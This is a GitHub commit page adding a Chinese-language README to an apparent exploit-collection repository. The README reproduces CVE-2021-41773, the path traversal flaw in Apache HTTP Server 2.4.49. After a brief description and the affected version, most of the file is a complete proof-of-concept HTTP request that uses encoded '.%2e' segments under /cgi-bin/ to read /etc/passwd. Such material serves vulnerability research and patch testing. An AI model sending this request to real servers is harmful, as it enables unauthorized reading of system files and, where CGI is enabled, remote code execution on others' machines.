forked from msr00t/0day
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
add CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现
- Loading branch information
Showing
2 changed files
with
20 additions
and
0 deletions.
There are no files selected for viewing
19 changes: 19 additions & 0 deletions
19
03-Apache & Tomcat/Apache/(CVE-2021-41773) Apache 路径穿越漏洞/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| # CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现 | ||
| > Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。 | ||
| ## 受影响版本 | ||
| Apache HTTP Server 2.4.49 | ||
|
|
||
| ## POC | ||
| ```http request | ||
| GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 | ||
| Host: https://www.xxxx.com/yyy | ||
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | ||
| Accept-Language: en-US,en;q=0.5 | ||
| Accept-Encoding: gzip, deflate | ||
| Connection: close | ||
| Upgrade-Insecure-Requests: 1 | ||
| Pragma: no-cache | ||
| Cache-Control: no-cache | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters